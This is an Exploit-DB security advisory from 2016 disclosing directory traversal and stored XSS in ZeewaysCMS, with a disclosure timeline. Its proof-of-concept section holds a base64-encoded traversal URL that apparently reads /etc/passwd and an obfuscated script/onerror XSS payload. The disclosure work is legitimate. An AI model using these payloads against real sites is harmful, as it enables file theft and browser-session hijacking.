ZeewaysCMS - Multiple Vulnerabilities

EDB-ID:

39784

CVE:

N/A

EDB Verified:

Author:

Bikramaditya Guha

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2016-05-09

Vulnerable App: 
ZeewaysCMS Multiple Vulnerabilities


[Software]

- ZeewaysCMS


[Vendor Product Description]

- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates, 
Individuals or any kind of Business needs.


- Site: http://www.zeewayscms.com/


[Advisory Timeline]

[25.03.2016] Vulnerability discovered.
[25.03.2016] Vendor contacted.
[29.03.2016] Follow up with the vendor.
[29.03.2016] Vendor responded asking for details.
[29.03.2016] Advisory and details sent to the vendor.
[06.04.2016] Follow up with the vendor. No response received.
[06.05.2016] Public security advisory released.


[Bug Summary]

- Directory Traversal

- Cross Site Scripting (Stored)


[Impact]

- High


[Affected Version]

- Unknown


[Tested on]

- Apache/2.2.27
- PHP/5.4.28


[Advisory]

- ID: ZSL-2016-5319
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php


[Bug Description and Proof of Concept]

- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET 
parameter is not properly verified before being used to include files. This can be exploited to include files from 
local resources with directory traversal attacks and URL encoded NULL bytes.
https://en.wikipedia.org/wiki/Directory_traversal_attack

- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed 
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to 
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting


[Proof-of-Concept]

1. Directory Traversal:

http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Parameters: targeturl (GET)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Stored)

http://localhost/demo/profile
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)

Payload(s):
Content-Disposition: form-data; name="screen_name"

"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services